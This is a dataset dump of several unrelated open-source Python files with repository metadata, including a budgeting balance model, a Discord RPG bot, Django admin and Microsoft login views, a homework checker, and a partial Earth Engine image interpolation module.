fields = '__all__' | 0 | 1,385 | 92 |
2a33d92b09cdd36e7f6ec1fff6cef6606fe79768 | 1,680 | py | Python | backend/underbudget/models/balance.py | vimofthevine/underbudget4 | c90eecf9879f7ce57c77a68b3f83b1d76c4451af | [
"MIT"
] | null | null | null | backend/underbudget/models/balance.py | vimofthevine/underbudget4 | c90eecf9879f7ce57c77a68b3f83b1d76c4451af | [
"MIT"
] | 45 | 2019-12-23T23:45:10.000Z | 2022-03-31T05:01:22.000Z | backend/underbudget/models/balance.py | vimofthevine/underbudget4 | c90eecf9879f7ce57c77a68b3f83b1d76c4451af | [
"MIT"
] | 1 | 2020-12-26T17:16:58.000Z | 2020-12-26T17:16:58.000Z | """ Balance resource model """
import datetime
from sqlalchemy.sql import func
from underbudget.database import db
from underbudget.models.transaction import (
AccountTransactionModel,
EnvelopeTransactionModel,
TransactionModel,
)
class AccountBalanceModel:
""" Account balance model """
@staticmethod
def get_balance(
account_id: int,
date: datetime.date,
) -> int:
""" Gets the balance of an account as of a particular date. """
result = (
db.session.query(
func.sum(AccountTransactionModel.amount).label("balance"), func.count()
)
.join(TransactionModel)
.filter(AccountTransactionModel.account_id == account_id)
.filter(TransactionModel.recorded_date <= date)
.first()
)
if result:
return {"balance": result[0], "total": result[1]}
return {"balance": 0, "total": 0}
class EnvelopeBalanceModel:
""" Envelope balance model """
@staticmethod
def get_balance(
envelope_id: int,
date: datetime.date,
) -> int:
""" Gets the balance of an envelope as of a particular date. """
result = (
db.session.query(
func.sum(EnvelopeTransactionModel.amount).label("balance"), func.count()
)
.join(TransactionModel)
.filter(EnvelopeTransactionModel.envelope_id == envelope_id)
.filter(TransactionModel.recorded_date <= date)
.first()
)
if result:
return {"balance": result[0], "total": result[1]}
return {"balance": 0, "total": 0}
| 29.473684 | 88 | 0.589881 | """ Balance resource model """
import datetime
from sqlalchemy.sql import func
from underbudget.database import db
from underbudget.models.transaction import (
AccountTransactionModel,
EnvelopeTransactionModel,
TransactionModel,
)
class AccountBalanceModel:
""" Account balance model """
@staticmethod
def get_balance(
account_id: int,
date: datetime.date,
) -> int:
""" Gets the balance of an account as of a particular date. """
result = (
db.session.query(
func.sum(AccountTransactionModel.amount).label("balance"), func.count()
)
.join(TransactionModel)
.filter(AccountTransactionModel.account_id == account_id)
.filter(TransactionModel.recorded_date <= date)
.first()
)
if result:
return {"balance": result[0], "total": result[1]}
return {"balance": 0, "total": 0}
class EnvelopeBalanceModel:
""" Envelope balance model """
@staticmethod
def get_balance(
envelope_id: int,
date: datetime.date,
) -> int:
""" Gets the balance of an envelope as of a particular date. """
result = (
db.session.query(
func.sum(EnvelopeTransactionModel.amount).label("balance"), func.count()
)
.join(TransactionModel)
.filter(EnvelopeTransactionModel.envelope_id == envelope_id)
.filter(TransactionModel.recorded_date <= date)
.first()
)
if result:
return {"balance": result[0], "total": result[1]}
return {"balance": 0, "total": 0}
| 0 | 0 | 0 |
b675fdc219149ecf8b3d0e204b58ec851f06e738 | 1,034 | py | Python | data_processing.py | forhacks/study-tool-back | 139c24fe1e2295493af62da48b6896614f4e2560 | [
"MIT"
] | null | null | null | data_processing.py | forhacks/study-tool-back | 139c24fe1e2295493af62da48b6896614f4e2560 | [
"MIT"
] | null | null | null | data_processing.py | forhacks/study-tool-back | 139c24fe1e2295493af62da48b6896614f4e2560 | [
"MIT"
] | null | null | null | import numpy as np
import re
from gensim.models import Word2Vec
max_len = 25
print('-- READING DATA --')
# read in defs
with open("data/definitions.txt") as f:
data = f.readlines()
# remove \n at end
data = [process_def(x.strip()) for x in data]
# reorganize into [[def 1, def 2, 1/0], [def 1, def 2, 1/0], ...]
data = np.reshape(data, (-1, 3)).T
x = data[:2].T
y = [int(x) for x in data[2:][0]]
model = Word2Vec.load("trained/w2v/trained.w2v")
x = [[model.wv[word] for word in a] for a in x]
np.save('data/x.npy', x)
np.save('data/y.npy', y)
| 24.046512 | 78 | 0.636364 | import numpy as np
import re
from gensim.models import Word2Vec
max_len = 25
def process_def(definition):
if len(definition) == 1:
return definition
definition = re.sub("[^a-zA-Z\s]", " ", definition).split()
definition = [a for a in definition if len(a) > 2]
def_arr = np.array(definition)
word_count = len(def_arr)
stretch = ([max_len/word_count + 1] * (max_len % word_count))
stretch.extend([max_len/word_count] * (word_count - max_len % word_count))
def_arr = np.repeat(def_arr, stretch)
return def_arr
print('-- READING DATA --')
# read in defs
with open("data/definitions.txt") as f:
data = f.readlines()
# remove \n at end
data = [process_def(x.strip()) for x in data]
# reorganize into [[def 1, def 2, 1/0], [def 1, def 2, 1/0], ...]
data = np.reshape(data, (-1, 3)).T
x = data[:2].T
y = [int(x) for x in data[2:][0]]
model = Word2Vec.load("trained/w2v/trained.w2v")
x = [[model.wv[word] for word in a] for a in x]
np.save('data/x.npy', x)
np.save('data/y.npy', y)
| 454 | 0 | 23 |
1de5aae6b063475c9c8982362905164051ea6329 | 812 | py | Python | Week4/task2-3.py | Ivancaminal72/mcv-m6-2018-team3 | dcdbc97d6d9534f1c0479e98113f35bca0084d86 | [
"MIT"
] | 1 | 2019-06-08T10:27:08.000Z | 2019-06-08T10:27:08.000Z | Week4/task2-3.py | Ivancaminal72/mcv-m6-2018-team3 | dcdbc97d6d9534f1c0479e98113f35bca0084d86 | [
"MIT"
] | null | null | null | Week4/task2-3.py | Ivancaminal72/mcv-m6-2018-team3 | dcdbc97d6d9534f1c0479e98113f35bca0084d86 | [
"MIT"
] | 1 | 2018-09-16T22:17:06.000Z | 2018-09-16T22:17:06.000Z | from utils import *
import os
import numpy as np
from video_stabilization import video_stabilization
PlotsDirectory = '../plots/Week4/task2-3/'
if not os.path.exists(PlotsDirectory):
os.makedirs(PlotsDirectory)
print("reading video...")
seq_color = video_to_frame('video1.mp4', grayscale=False)
max_size = 100
seq_color = seq_color[0:max_size]
#block_size_x, block_size_y, search_area_x, search_area_y = 20, 20, 20, 20
#print("stabilizing video...")
#print(seq_color.shape)
#est_seq = video_stabilization(seq_color, block_size_x, block_size_y, search_area_x, search_area_y,
# compensation='backward', grayscale=False, resize=(320, 240))
#print("saving video...")
#np.save(PlotsDirectory + 'own_stabilization.npy', est_seq)
write_images2(seq_color, PlotsDirectory, 'seq_')
| 30.074074 | 99 | 0.743842 | from utils import *
import os
import numpy as np
from video_stabilization import video_stabilization
PlotsDirectory = '../plots/Week4/task2-3/'
if not os.path.exists(PlotsDirectory):
os.makedirs(PlotsDirectory)
print("reading video...")
seq_color = video_to_frame('video1.mp4', grayscale=False)
max_size = 100
seq_color = seq_color[0:max_size]
#block_size_x, block_size_y, search_area_x, search_area_y = 20, 20, 20, 20
#print("stabilizing video...")
#print(seq_color.shape)
#est_seq = video_stabilization(seq_color, block_size_x, block_size_y, search_area_x, search_area_y,
# compensation='backward', grayscale=False, resize=(320, 240))
#print("saving video...")
#np.save(PlotsDirectory + 'own_stabilization.npy', est_seq)
write_images2(seq_color, PlotsDirectory, 'seq_')
| 0 | 0 | 0 |
460e22311c49b2fe9b2c2d655315d937aeac865b | 813 | py | Python | server/django/src/website/admin.py | tnakagami/home_server | 99071aa047f8635c53cd7dfa9ed812bff6a6cd0c | [
"Apache-2.0"
] | null | null | null | server/django/src/website/admin.py | tnakagami/home_server | 99071aa047f8635c53cd7dfa9ed812bff6a6cd0c | [
"Apache-2.0"
] | null | null | null | server/django/src/website/admin.py | tnakagami/home_server | 99071aa047f8635c53cd7dfa9ed812bff6a6cd0c | [
"Apache-2.0"
] | null | null | null | from django.contrib import admin
from import_export import resources
from import_export.admin import ImportExportModelAdmin
from . import models
@admin.register(models.ControllerLink)
@admin.register(models.ControllerCommand)
| 32.52 | 57 | 0.767528 | from django.contrib import admin
from import_export import resources
from import_export.admin import ImportExportModelAdmin
from . import models
class ControllerLinkResource(resources.ModelResource):
class Meta:
model = models.ControllerLink
class ControllerCommandResource(resources.ModelResource):
class Meta:
model = models.ControllerCommand
@admin.register(models.ControllerLink)
class ControllerLinkAdmin(ImportExportModelAdmin):
ordering = ('id', )
list_display = ('id', 'name', 'link_name', 'detail')
resource_class = ControllerLinkResource
@admin.register(models.ControllerCommand)
class ControllerCommandAdmin(ImportExportModelAdmin):
ordering = ('id', )
list_display = ('id', 'task_name', 'link', 'command')
resource_class = ControllerCommandResource
| 0 | 495 | 90 |
7f352b13447c3e217095218dd87a8d7019d83f3a | 7,803 | py | Python | uwu.py | CapnS/uwu-bot | 3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04 | [
"MIT"
] | null | null | null | uwu.py | CapnS/uwu-bot | 3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04 | [
"MIT"
] | null | null | null | uwu.py | CapnS/uwu-bot | 3c06badaa3c76d3f2f6949fbcc20c7b0e33a5e04 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
import traceback
import asyncio
import asyncpg
import yaml # removed aiofiles because its not needed
from datetime import datetime
import os
import sys
import logging
import aiohttp
import aioredis
import psutil
import discord
from utils import errorhandler
import logging.handlers
import lavalink
import utils
logger = logging.getLogger("bot")
logger.setLevel(logging.INFO)
handler = logging.handlers.TimedRotatingFileHandler(
filename=f"logs/bot.log",
encoding="utf-8",
when="D",
interval=1,
utc=True,
backupCount=10,
)
handler.setFormatter(
logging.Formatter("[%(asctime)s:%(levelname)s:%(name)s] %(message)s")
)
logger.addHandler(handler)
try:
import uvloop
except ImportError:
if (
sys.platform == "linux"
): # alert the user to install uvloop if they are on a linux system
print("UVLoop not detected")
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
description = """uwu. A RPG bot made by mellowmarshe#0001"""
startup_extensions = [
"jishaku",
"utils.errorhandler",
"modules.create",
"modules.exploring",
"modules.owner",
"modules.uwulonian",
"modules.misc",
"modules.patron",
"modules.DBL",
"modules.uwus",
"modules.events",
"modules.daily",
"modules.pets",
"modules.help",
"modules.votes",
"modules.logging",
"modules.music",
"modules.moderation",
]
prefixes = ["uwu ", "|"]
if __name__ == "__main__":
uwu().run()
| 31.46371 | 120 | 0.607587 | import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
import traceback
import asyncio
import asyncpg
import yaml # removed aiofiles because its not needed
from datetime import datetime
import os
import sys
import logging
import aiohttp
import aioredis
import psutil
import discord
from utils import errorhandler
import logging.handlers
import lavalink
import utils
logger = logging.getLogger("bot")
logger.setLevel(logging.INFO)
handler = logging.handlers.TimedRotatingFileHandler(
filename=f"logs/bot.log",
encoding="utf-8",
when="D",
interval=1,
utc=True,
backupCount=10,
)
handler.setFormatter(
logging.Formatter("[%(asctime)s:%(levelname)s:%(name)s] %(message)s")
)
logger.addHandler(handler)
try:
import uvloop
except ImportError:
if (
sys.platform == "linux"
): # alert the user to install uvloop if they are on a linux system
print("UVLoop not detected")
else:
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
description = """uwu. A RPG bot made by mellowmarshe#0001"""
startup_extensions = [
"jishaku",
"utils.errorhandler",
"modules.create",
"modules.exploring",
"modules.owner",
"modules.uwulonian",
"modules.misc",
"modules.patron",
"modules.DBL",
"modules.uwus",
"modules.events",
"modules.daily",
"modules.pets",
"modules.help",
"modules.votes",
"modules.logging",
"modules.music",
"modules.moderation",
]
prefixes = ["uwu ", "|"]
class uwu(commands.Bot):
def __init__(self):
super().__init__(
command_prefix=self.get_pre,
case_insensitive=True,
description=description,
reconnect=True,
status=discord.Status.idle,
activity=discord.Game("Booting up"),
)
self.launch_time = datetime.utcnow()
self.config = yaml.load(open("config.yml"))
self.pool = None # pool is unset till the bot is ready
self.session = aiohttp.ClientSession(loop=self.loop)
self.process = psutil.Process(os.getpid())
self.loop = asyncio.get_event_loop()
self.logger = logging.getLogger("bot")
self.blacklisted = []
self.patrons = []
self.prefixes = {}
self.commands_ran = 0
self.add_check(self.global_cooldown)
map = commands.CooldownMapping.from_cooldown(1, 4, commands.BucketType.user)
async def get_pre(self, bot, message):
if not message.guild:
return commands.when_mentioned_or(*prefixes)(bot, message)
try:
prefixess = bot.prefixes[message.guild.id]
if prefixess:
return commands.when_mentioned_or(prefixess)(bot, message)
except KeyError:
return commands.when_mentioned_or(*prefixes)(bot, message)
async def global_cooldown(self, ctx: commands.Context):
bucket = self.map.get_bucket(ctx.message)
retry_after = bucket.update_rate_limit()
if retry_after:
raise errorhandler.IsRatelimited(ctx, retry_after)
else:
return True
async def start(self):
for ext in startup_extensions:
try:
self.load_extension(ext)
except BaseException as e:
print(f"Failed to load {ext}\n{type(e).__name__}: {e}")
await super().start(self.config["token"])
async def on_message_edit(self, before, after):
if after.author.bot:
return
ctx = await self.get_context(after)
if ctx.command:
if after.author.id in self.blacklisted:
return await after.channel.send(
f"You may not use uwu. You were blacklisted."
)
await self.process_commands(after)
async def on_message(self, message):
if message.author.bot:
return
ctx = await self.get_context(message)
if ctx.command:
if message.author.id in self.blacklisted:
return await message.channel.send(
f"You may not use uwu. You were blacklisted."
)
await self.process_commands(message)
async def init_conns(self):
await self.init_dbs()
await self.init_ll()
async def init_dbs(self):
self.redis = await aioredis.create_redis_pool(
"redis://localhost",
password=self.config["redispassword"],
minsize=5,
maxsize=10,
loop=self.loop,
)
credentials = {
"user": self.config["dbuser"],
"password": self.config["dbpassword"],
"database": self.config["dbname"],
"host": "127.0.0.1",
}
self.pool = await asyncpg.create_pool(**credentials, max_size=150)
async def init_ll(self):
self.lavalink = lavalink.Client(self.user.id)
self.lavalink.add_node(
self.config["lavalink_ip"], 8080, self.config["lavalink"], "us", "us-east"
)
self.add_listener(self.lavalink.voice_update_handler, "on_socket_response")
async def on_ready(self):
await self.init_conns()
with open("utils/schema.sql") as f:
await self.pool.execute(f.read())
print("Bot ready!")
bl_users = await self.pool.fetch("SELECT * FROM blacklists")
patrons = await self.pool.fetch("SELECT * FROM p_users")
prefixes = await self.pool.fetch("SELECT guild_id, prefix FROM guild_prefixes")
for i in prefixes:
self.prefixes[i[0]] = i[1]
for i in range(len(bl_users)):
self.blacklisted.append(int(bl_users[i]["user_id"]))
self.logger.info(f"[Start] Blacklisted users added.")
for i in range(len(patrons)):
self.patrons.append(int(patrons[i]["user_id"]))
self.logger.info(f"[Start] Patrons added.")
game = discord.Game("with fwends")
await self.change_presence(status=discord.Status.dnd, activity=game)
self.logger.info(
f"[Start] Bot started with {len(self.guilds)} guilds and {len(self.users)} users."
)
async def on_command_completion(self, ctx):
self.commands_ran += 1
async def process_commands(self, message):
ctx = await self.get_context(message, cls=utils.context.Context)
if ctx.command is None:
return
await self.invoke(ctx)
async def on_message_delete(self, message):
content = message.content
msg_type_o = 0
if message.attachments:
content = message.attachments[0].proxy_url
msg_type_o = 1
if message.embeds:
content = message.embeds[0].description
msg_type_o = 2
try:
await self.pool.execute(
"""INSERT INTO del_snipe (guild_id, user_id, channel_id, message, msg_type) VALUES ($1, $2, $3, $4, $5)
ON CONFLICT (channel_id) DO UPDATE SET user_id = $2, message = $4, msg_type = $5""",
message.guild.id,
message.author.id,
message.channel.id,
content,
msg_type_o,
)
except:
pass
async def on_guild_remove(self, guild):
await self.redis.execute("DECR", "current_guilds")
self.logger.info(
f"[Guild] Left guild {guild.name}({guild.id}) with {len(guild.members)} members"
)
async def on_guild_join(self, guild):
await self.redis.execute("INCR", "current_guilds")
self.logger.info(
f"[Guild] Joined guild {guild.name}({guild.id}) with {len(guild.members)} members"
)
if __name__ == "__main__":
uwu().run()
| 5,706 | 489 | 23 |
4c1890046ab803b3871ec96ec6882ad7a0af8294 | 975 | py | Python | microsoft_authentication/views.py | akaytatsu/django-microsoft-authentication | 8c0c42abc8aae40ebeac4100acc0564f296c6406 | [
"MIT"
] | 3 | 2021-02-26T08:32:21.000Z | 2021-07-29T14:10:11.000Z | microsoft_authentication/views.py | akaytatsu/django-microsoft-authentication | 8c0c42abc8aae40ebeac4100acc0564f296c6406 | [
"MIT"
] | 2 | 2021-06-21T23:00:23.000Z | 2021-07-02T09:32:00.000Z | microsoft_authentication/views.py | akaytatsu/django-microsoft-authentication | 8c0c42abc8aae40ebeac4100acc0564f296c6406 | [
"MIT"
] | 2 | 2021-06-21T22:18:11.000Z | 2021-10-11T12:34:02.000Z | from django.http import HttpResponseRedirect, HttpResponseForbidden
from django.contrib.auth import login, logout
from django.conf import settings
from microsoft_authentication.auth.auth_utils import (
get_sign_in_flow,
get_token_from_code,
get_user,
get_django_user,
get_logout_url,
)
| 27.083333 | 72 | 0.733333 | from django.http import HttpResponseRedirect, HttpResponseForbidden
from django.contrib.auth import login, logout
from django.conf import settings
from microsoft_authentication.auth.auth_utils import (
get_sign_in_flow,
get_token_from_code,
get_user,
get_django_user,
get_logout_url,
)
def microsoft_login(request):
flow = get_sign_in_flow()
try:
request.session['auth_flow'] = flow
except Exception as e:
print(e)
return HttpResponseRedirect(flow['auth_uri'])
def microsoft_logout(request):
logout(request)
return HttpResponseRedirect(get_logout_url())
def callback(request):
result = get_token_from_code(request)
ms_user = get_user(result['access_token'])
user = get_django_user(email=ms_user['mail'])
if user:
login(request, user)
else:
return HttpResponseForbidden("Invalid email for this app.")
return HttpResponseRedirect(settings.LOGIN_REDIRECT_URL or "/admin")
| 597 | 0 | 69 |
a4f80aad75cf3811b8a00b25c929d27b04510ba0 | 1,206 | py | Python | ipb_homework_checker/check_homework.py | PRBonn/ipb_homework_checker | 750a42d19a6fb6f8d18785bd8bc1d7aea9caba50 | [
"Apache-2.0"
] | 11 | 2018-12-18T16:21:58.000Z | 2021-07-11T06:31:24.000Z | ipb_homework_checker/check_homework.py | PRBonn/ipb_homework_checker | 750a42d19a6fb6f8d18785bd8bc1d7aea9caba50 | [
"Apache-2.0"
] | 1 | 2018-12-18T00:43:23.000Z | 2018-12-18T00:43:23.000Z | ipb_homework_checker/check_homework.py | PRBonn/ipb_homework_checker | 750a42d19a6fb6f8d18785bd8bc1d7aea9caba50 | [
"Apache-2.0"
] | 3 | 2020-08-15T16:07:17.000Z | 2020-11-15T20:23:00.000Z | #!/usr/bin/python3
"""Script to check this homework."""
import argparse
import logging
from .checker import Checker
from .md_writer import MdWriter
logging.basicConfig()
log = logging.getLogger("GHC")
log.setLevel(logging.INFO)
def main():
"""Run this script."""
parser = argparse.ArgumentParser()
parser.add_argument(
'-v', '--verbose',
help='Make the output verbose.',
action='store_true')
parser.add_argument(
'-i', '--input',
help='An input *.yml file with the job definition.',
required=True)
parser.add_argument(
'-o', '--output',
help='An output *.md file with the results.',
required=True)
args = parser.parse_args()
if args.verbose:
log.setLevel(logging.DEBUG)
log.debug('Enable DEBUG logging.')
# Read the job file.
log.debug('Reading from file "%s"', args.input)
checker = Checker(args.input)
results = checker.check_homework()
md_writer = MdWriter()
md_writer.update(results)
# Write the resulting markdown file.
log.debug('Writing to file "%s"', args.output)
md_writer.write_md_file(args.output)
if __name__ == "__main__":
main()
| 25.659574 | 60 | 0.637645 | #!/usr/bin/python3
"""Script to check this homework."""
import argparse
import logging
from .checker import Checker
from .md_writer import MdWriter
logging.basicConfig()
log = logging.getLogger("GHC")
log.setLevel(logging.INFO)
def main():
"""Run this script."""
parser = argparse.ArgumentParser()
parser.add_argument(
'-v', '--verbose',
help='Make the output verbose.',
action='store_true')
parser.add_argument(
'-i', '--input',
help='An input *.yml file with the job definition.',
required=True)
parser.add_argument(
'-o', '--output',
help='An output *.md file with the results.',
required=True)
args = parser.parse_args()
if args.verbose:
log.setLevel(logging.DEBUG)
log.debug('Enable DEBUG logging.')
# Read the job file.
log.debug('Reading from file "%s"', args.input)
checker = Checker(args.input)
results = checker.check_homework()
md_writer = MdWriter()
md_writer.update(results)
# Write the resulting markdown file.
log.debug('Writing to file "%s"', args.output)
md_writer.write_md_file(args.output)
if __name__ == "__main__":
main()
| 0 | 0 | 0 |
b3a96457def15d3ea68d7d61ff73d5f543998c9c | 785 | py | Python | Hacker rank/he.py | arghasen/Poker | ea4f4c41371b0bab2540e79141915fd7405dcb43 | [
"MIT"
] | null | null | null | Hacker rank/he.py | arghasen/Poker | ea4f4c41371b0bab2540e79141915fd7405dcb43 | [
"MIT"
] | null | null | null | Hacker rank/he.py | arghasen/Poker | ea4f4c41371b0bab2540e79141915fd7405dcb43 | [
"MIT"
] | null | null | null | T = int(raw_input())
for t in range(T):
n, m = map(int, raw_input().split())
powers = {}
bullets = {}
origBullet = 0
levelBullet = 0
for ni in range( n):
powers[ni] = map(int, raw_input().split())
for ni in range( n):
bullets[ni] = map(int, raw_input().split())
bullets[-1] = [0 for _ in range(m)]
dpminbul={}
print minbul() | 35.681818 | 175 | 0.55414 | T = int(raw_input())
for t in range(T):
n, m = map(int, raw_input().split())
powers = {}
bullets = {}
origBullet = 0
levelBullet = 0
for ni in range( n):
powers[ni] = map(int, raw_input().split())
for ni in range( n):
bullets[ni] = map(int, raw_input().split())
bullets[-1] = [0 for _ in range(m)]
dpminbul={}
def minbul(level=0):
if dpminbul.get(level):
return dpminbul[level]
levelBullet = bullets[level-1]
if level ==n:
return 0
dpminbul[level]=min([powers[level][i]-levelBullet[j]+minbul(level+1)if powers[level][i]-levelBullet[j] >0 else minbul(level+1)for i in range(m) for j in range(m)])
return dpminbul[level]
print minbul() | 379 | 0 | 26 |
1b68728e4c9fce3d77e5260d475642a9f4616673 | 49,516 | py | Python | openet/core/interpolate.py | torresrua/openet-core-beta | 95f830164ed579f72fc383ac4e1fa6b6b11bdbac | [
"Apache-2.0"
] | null | null | null | openet/core/interpolate.py | torresrua/openet-core-beta | 95f830164ed579f72fc383ac4e1fa6b6b11bdbac | [
"Apache-2.0"
] | null | null | null | openet/core/interpolate.py | torresrua/openet-core-beta | 95f830164ed579f72fc383ac4e1fa6b6b11bdbac | [
"Apache-2.0"
] | 1 | 2021-08-17T04:37:23.000Z | 2021-08-17T04:37:23.000Z | import datetime
import logging
import ee
from dateutil.relativedelta import *
from . import utils
# import openet.core.utils as utils
def daily(target_coll, source_coll, interp_days=32, interp_method='linear',
use_joins=False, compute_product=False):
"""Interpolate non-daily source images to a daily target image collection
Parameters
----------
target_coll : ee.ImageCollection
Source images will be interpolated to each target image time_start.
Target images should have a daily time step. This will typically be
the reference ET (ETr) collection.
source_coll : ee.ImageCollection
Images that will be interpolated to the target image collection.
This will typically be the fraction of reference ET (ETrF) collection.
interp_days : int, optional
Number of days before and after each image date to include in the
interpolation (the default is 32).
interp_method : {'linear'}, optional
Interpolation method (the default is 'linear').
use_joins : bool, optional
If True, the source collection will be joined to the target collection
before mapping/interpolation and the source images will be extracted
from the join properties ('prev' and 'next').
Setting use_joins=True should be more memory efficient.
If False, the source images will be built by filtering the source
collection separately for each image in the target collection
(inside the mapped function).
compute_product : bool, optional
If True, compute the product of the target and all source image bands.
The default is False.
Returns
-------
ee.ImageCollection() of daily interpolated images
Raises
------
ValueError
If `interp_method` is not a supported method.
"""
prev_filter = ee.Filter.And(
ee.Filter.maxDifference(
difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
leftField='system:time_start',
rightField='system:time_start',
),
ee.Filter.greaterThan(
leftField='system:time_start',
rightField='system:time_start',
)
)
next_filter = ee.Filter.And(
ee.Filter.maxDifference(
difference=(interp_days + 1) * 24 * 60 * 60 * 1000,
leftField='system:time_start',
rightField='system:time_start',
),
ee.Filter.lessThanOrEquals(
leftField='system:time_start',
rightField='system:time_start',
)
)
if use_joins:
# Join the neighboring Landsat images in time
target_coll = ee.ImageCollection(
ee.Join.saveAll(
matchesKey='prev',
ordering='system:time_start',
ascending=True,
outer=True,
).apply(
primary=target_coll,
secondary=source_coll,
condition=prev_filter,
)
)
target_coll = ee.ImageCollection(
ee.Join.saveAll(
matchesKey='next',
ordering='system:time_start',
ascending=False,
outer=True,
).apply(
primary=target_coll,
secondary=source_coll,
condition=next_filter,
)
)
# # DEADBEEF - This module is assuming that the time band is already in
# # the source collection.
# # Uncomment the following to add a time band here instead.
# def add_utc0_time_band(image):
# date_0utc = utils.date_0utc(ee.Date(image.get('system:time_start')))
# return image.addBands([
# image.select([0]).double().multiply(0).add(date_0utc.millis())\
# .rename(['time'])])
# source_coll = ee.ImageCollection(source_coll.map(add_utc0_time_band))
if interp_method.lower() == 'linear':
def _linear(image):
"""Linearly interpolate source images to target image time_start(s)
Parameters
----------
image : ee.Image.
The first band in the image will be used as the "target" image
and will be returned with the output image.
Returns
-------
ee.Image of interpolated values with band name 'src'
Notes
-----
The source collection images must have a time band.
This function is intended to be mapped over an image collection and
can only take one input parameter.
"""
# target_img = ee.Image(image).select(0).double()
target_date = ee.Date(image.get('system:time_start'))
# All filtering will be done based on 0 UTC dates
utc0_date = utils.date_0utc(target_date)
# utc0_time = target_date.update(hour=0, minute=0, second=0)\
# .millis().divide(1000).floor().multiply(1000)
time_img = ee.Image.constant(utc0_date.millis()).double()
# Build nodata images/masks that can be placed at the front/back of
# of the qm image collections in case the collections are empty.
bands = source_coll.first().bandNames()
prev_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
.double().rename(bands).updateMask(0)\
.set({
'system:time_start': utc0_date.advance(
-interp_days - 1, 'day').millis()})
next_qm_mask = ee.Image.constant(ee.List.repeat(1, bands.length()))\
.double().rename(bands).updateMask(0)\
.set({
'system:time_start': utc0_date.advance(
interp_days + 2, 'day').millis()})
if use_joins:
# Build separate mosaics for before and after the target date
prev_qm_img = ee.ImageCollection\
.fromImages(ee.List(ee.Image(image).get('prev')))\
.merge(ee.ImageCollection(prev_qm_mask))\
.sort('system:time_start', True)\
.mosaic()
next_qm_img = ee.ImageCollection\
.fromImages(ee.List(ee.Image(image).get('next')))\
.merge(ee.ImageCollection(next_qm_mask))\
.sort('system:time_start', False)\
.mosaic()
else:
# Build separate collections for before and after the target date
prev_qm_coll = source_coll\
.filterDate(utc0_date.advance(-interp_days, 'day'), utc0_date)\
.merge(ee.ImageCollection(prev_qm_mask))
next_qm_coll = source_coll\
.filterDate(utc0_date, utc0_date.advance(interp_days + 1, 'day'))\
.merge(ee.ImageCollection(next_qm_mask))
# Flatten the previous/next collections to single images
# The closest image in time should be on "top"
# CGM - Is the previous collection already sorted?
# prev_qm_img = prev_qm_coll.mosaic()
prev_qm_img = prev_qm_coll.sort('system:time_start', True)\
.mosaic()
next_qm_img = next_qm_coll.sort('system:time_start', False)\
.mosaic()
# DEADBEEF - It might be easier to interpolate all bands instead of
# separating the value and time bands
# prev_value_img = ee.Image(prev_qm_img).double()
# next_value_img = ee.Image(next_qm_img).double()
# Interpolate all bands except the "time" band
prev_bands = prev_qm_img.bandNames()\
.filter(ee.Filter.notEquals('item', 'time'))
next_bands = next_qm_img.bandNames()\
.filter(ee.Filter.notEquals('item', 'time'))
prev_value_img = ee.Image(prev_qm_img.select(prev_bands)).double()
next_value_img = ee.Image(next_qm_img.select(next_bands)).double()
prev_time_img = ee.Image(prev_qm_img.select('time')).double()
next_time_img = ee.Image(next_qm_img.select('time')).double()
# Fill masked values with values from the opposite image
# Something like this is needed to ensure there are always two
# values to interpolate between
# For data gaps, this will cause a flat line instead of a ramp
prev_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
next_time_img, prev_time_img]).mosaic())
next_time_mosaic = ee.Image(ee.ImageCollection.fromImages([
prev_time_img, next_time_img]).mosaic())
prev_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
next_value_img, prev_value_img]).mosaic())
next_value_mosaic = ee.Image(ee.ImageCollection.fromImages([
prev_value_img, next_value_img]).mosaic())
# Calculate time ratio of the current image between other cloud free images
time_ratio_img = time_img.subtract(prev_time_mosaic)\
.divide(next_time_mosaic.subtract(prev_time_mosaic))
# Interpolate values to the current image time
interp_img = next_value_mosaic.subtract(prev_value_mosaic)\
.multiply(time_ratio_img).add(prev_value_mosaic)
# Pass the target image back out as a new band
target_img = image.select([0]).double()
output_img = interp_img.addBands([target_img])\
# TODO: Come up with a dynamic way to name the "product" bands
# The product bands will have a "_1" appended to the name
# i.e. "et_fraction" -> "et_fraction_1"
if compute_product:
output_img = output_img\
.addBands([interp_img.multiply(target_img)])
return output_img.set({
'system:index': image.get('system:index'),
'system:time_start': image.get('system:time_start'),
# 'system:time_start': utc0_time,
})
interp_coll = ee.ImageCollection(target_coll.map(_linear))
# elif interp_method.lower() == 'nearest':
# interp_coll = ee.ImageCollection(target_coll.map(_nearest))
else:
raise ValueError('invalid interpolation method: {}'.format(interp_method))
return interp_coll
# @deprecated
def aggregate_to_daily(image_coll, start_date=None, end_date=None,
agg_type='mean'):
"""Aggregate images by day without using joins
The primary purpose of this function is to join separate Landsat images
from the same path into a single daily image.
Parameters
----------
image_coll : ee.ImageCollection
Input image collection.
start_date : date, number, string, optional
Start date.
Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
end_date : date, number, string, optional
Exclusive end date.
Needs to be an EE readable date (i.e. ISO Date string or milliseconds).
agg_type : {'mean'}, optional
Aggregation type (the default is 'mean').
Currently only a 'mean' aggregation type is supported.
Returns
-------
ee.ImageCollection()
Notes
-----
This function should be used to mosaic Landsat images from same path
but different rows.
system:time_start of returned images will be 0 UTC (not the image time).
"""
if start_date and end_date:
test_coll = image_coll.filterDate(ee.Date(start_date), ee.Date(end_date))
elif start_date:
test_coll = image_coll.filter(ee.Filter.greaterThanOrEquals(
'system:time_start', ee.Date(start_date).millis()))
elif end_date:
test_coll = image_coll.filter(ee.Filter.lessThan(
'system:time_start', ee.Date(end_date).millis()))
else:
test_coll = image_coll
# Build a sorted list of the unique "dates" in the image_coll
date_list = ee.List(test_coll.aggregate_array('system:time_start'))\
.map(lambda time: ee.Date(ee.Number(time)).format('yyyy-MM-dd'))\
.distinct().sort()
return ee.ImageCollection(date_list.map(aggregate_func))
def from_scene_et_fraction(scene_coll, start_date, end_date, variables,
interp_args, model_args, t_interval='custom',
use_joins=False,
):
